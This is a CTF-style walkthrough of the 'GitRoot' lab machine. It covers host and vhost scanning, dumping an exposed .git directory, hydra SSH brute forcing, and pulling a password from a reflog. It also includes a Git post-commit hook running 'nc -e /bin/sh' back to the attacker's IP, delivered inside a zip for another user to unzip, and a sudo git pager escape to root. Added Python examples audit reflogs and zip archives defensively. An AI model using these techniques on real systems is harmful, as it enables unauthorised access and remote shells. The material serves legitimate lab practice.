GitRoot Walkthrough

Start by scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Visiting the page, we see a message telling us to add http://wp.gitroot.vuln/ to our hosts file:

After adding the site to /etc/hosts, we can see it's a WordPress site, and we can scan it with Dirb:

We enumerate users with wpscan --url http://wp.gitroot.vuln -e u

Brute forcing the logins for a while came to nothing, so I went back to brute forcing directories. I used dirsearch and gobuster and finally got a result. At first I tried:

gobuster vhost --url http://wp.gitroot.vuln/ -w /usr/share/dirb/wordlists/big.txt but it found nothing, so then I tried:

gobuster vhost --url http://gitroot.vuln/ -w /usr/share/dirb/wordlists/common.txt and updated the hosts file accordingly.

I found a lot of directories and files, and one of the results was a new virtual host: repo.gitroot.vuln

Then we run gobuster dir --url http://repo.gitroot.vuln -w /usr/share/dirb/wordlists/common.txt:

The scan shows an exposed .git directory. Now we use a very handy tool (gitdumper.sh) to download that Git directory to our machine, and then we run it:

./gitdumper.sh http://repo.gitroot.vuln/.git/ /root/

Looking inside the dumped repository I found a few files, the name Pablo as the root committer, and a new file with a long name:

None of those passwords worked for WordPress or SSH, so I decided to take the name Pablo and brute force the SSH service we found open:

hydra -l pablo -P /root/pass/rockyou.txt ssh://192.168.1.5 -f -vV

It took a long time but finally got a hit. Now we use the password we found to log in as Pablo; after logging in we find the user.txt file:

There is also a Public folder where we find a new text file with a message:

Running LinEnum.sh didn't return much, but running PEASS gave some good information; in particular, it scans for Git artefacts such as names and repository folders:

Now we go to /opt/auth/.git/config, where the repository configuration is, and then into the /opt/auth/.git/logs/refs/heads folder, where we find a lot of files but only one of them differs in size:

We view it and there are several commit entries inside; reading through them we get to this one:

We get the username, which is beth, and the password, which is r3vpdmspqdb, so let's log in:
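The credential above was found by reading a branch reflog by hand. The following is an added example, not part of the original writeup: it parses reflog lines of the form <old-sha> <new-sha> <name> <email> <time> <tz>TAB<message> (the format under .git/logs/refs/heads/) and flags entries whose commit message hints at a secret, the kind of pre-publication audit that would have caught this before the repository was shared. The sample reflog, the names and the values in it are constructed for the example and are not taken from the box.

```python
import re
import sys
from dataclasses import dataclass
from typing import List

# Constructed sample of a .git/logs/refs/heads/<branch> file (not from the box).
# Fields: <old-sha> <new-sha> <Name> <<email>> <unix-time> <tz>\t<message>
SAMPLE_REFLOG = """\
0000000000000000000000000000000000000000 1111111111111111111111111111111111111111 Dev One <dev@example.test> 1600000000 +0000\tcommit (initial): first commit
1111111111111111111111111111111111111111 2222222222222222222222222222222222222222 Dev One <dev@example.test> 1600000100 +0000\tcommit: added login form
2222222222222222222222222222222222222222 3333333333333333333333333333333333333333 Dev One <dev@example.test> 1600000200 +0000\tcommit: set temporary password for deploy user to hunter2
3333333333333333333333333333333333333333 4444444444444444444444444444444444444444 Dev One <dev@example.test> 1600000300 +0000\tcommit: rotate API_KEY in config
"""

# One reflog record per line; the message is separated from the header by a tab.
REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) "
    r"(?P<name>.+?) <(?P<email>[^>]*)> (?P<time>\d+) (?P<tz>[+-]\d{4})\t(?P<msg>.*)$"
)

# Words that usually mean a commit touched a credential (deliberately broad).
SECRET_HINT_RE = re.compile(
    r"\b(password|passwd|pwd|token|secret|api[_ -]?key|credential)s?\b", re.I
)


@dataclass
class ReflogEntry:
    old_sha: str
    new_sha: str
    name: str
    email: str
    timestamp: int
    message: str


def parse_reflog(text: str) -> List[ReflogEntry]:
    """Parse reflog text into entries; raise on a line that is not a reflog record."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = REFLOG_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a reflog entry")
        entries.append(
            ReflogEntry(m["old"], m["new"], m["name"], m["email"], int(m["time"]), m["msg"])
        )
    return entries


def find_suspicious(entries: List[ReflogEntry]) -> List[ReflogEntry]:
    """Return the entries whose commit message mentions a credential-like term."""
    return [e for e in entries if SECRET_HINT_RE.search(e.message)]


if __name__ == "__main__":
    # Usage: python reflog_audit.py [path/to/.git/logs/refs/heads/<branch>]
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REFLOG
    for e in find_suspicious(parse_reflog(text)):
        print(f"{e.new_sha[:12]} {e.name} <{e.email}>: {e.message}")
```

Point this at the reflog files of a repository before it is pushed or copied anywhere; every flagged commit is one whose history (not just its current tree) should be checked, because a password that was later "removed" is still readable in the objects that commit points to.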

There is a new message for Beth in her Public folder, saying:

Hello Beth

If you want to commit to my repository you can add a zip file to ~jen/public/repos/ and I'll unzip it and add it to my repository

Thanks!

Now it's time to use this site's Git hook trick. On the target, in /tmp:

git init

echo 'nc -e /bin/sh 192.168.1.11 4444' > '/tmp/.git/hooks/post-commit'

chmod +x /tmp/.git/hooks/post-commit

7z a shell.zip .git

chmod +x shell.zip

cp shell.zip /home/jen/public/repos/shell.zip

On our machine we start a listener on port 4444 and wait for the reverse shell:
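The step that hands Jen's shell over is unzipping an archive from another user without looking at what is inside it. The following is an added example, not part of the original writeup: a small audit that inspects a zip archive before extraction and reports entries that are Git hooks, that carry an executable bit, or whose paths would escape the extraction directory. The sample archive is constructed inside the script (its hook body only echoes a line) and the function names are this example's own.

```python
import io
import posixpath
import stat
import zipfile
from typing import List, Tuple


def build_sample_zip(include_hook: bool = True) -> bytes:
    """Constructed sample archive: a .git tree, optionally with an executable post-commit hook."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(".git/HEAD", "ref: refs/heads/master\n")
        zf.writestr(".git/config", "[core]\n\trepositoryformatversion = 0\n")
        zf.writestr("README.md", "harmless file\n")
        if include_hook:
            info = zipfile.ZipInfo(".git/hooks/post-commit")
            # Unix mode lives in the high 16 bits of external_attr; 0o755 sets the exec bits.
            info.external_attr = (stat.S_IFREG | 0o755) << 16
            zf.writestr(info, "#!/bin/sh\necho hook ran\n")  # placeholder body; presence is what matters
    return buf.getvalue()


def audit_zip(data: bytes) -> List[Tuple[str, str]]:
    """Return (entry name, reason) pairs for every entry that should block extraction."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name)
            # Absolute paths or ".." components would write outside the target directory.
            if name.startswith("/") or norm == ".." or norm.startswith("../"):
                findings.append((name, "path escapes extraction directory"))
            if info.is_dir():
                continue
            # Any file under a .git/hooks/ directory runs on the next git operation.
            if "/.git/hooks/" in "/" + norm:
                findings.append((name, "git hook inside archive"))
            mode = (info.external_attr >> 16) & 0o777
            if mode & 0o111:
                findings.append((name, f"executable bit set ({mode:o})"))
    return findings


def safe_to_extract(data: bytes) -> bool:
    return not audit_zip(data)


if __name__ == "__main__":
    for reason in audit_zip(build_sample_zip()):
        print("BLOCK:", *reason)
    print("clean archive ok:", safe_to_extract(build_sample_zip(include_hook=False)))
```

Running the audit is not a substitute for the simpler fix, which is to never import a foreign .git directory at all (take a patch or a bundle and apply it into your own repository, so hooks never travel with the data), but it makes the exact trick used here visible before the unzip happens.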

In Jen's home directory there is a .viminfo file; viewing it we find an odd-looking word. I tried it as the password for sudo -l and it worked:

Back to the same site: since we can run Git through sudo, a few simple steps make us root:

After we press ENTER at the pager prompt we type !/bin/sh and get a root shell.
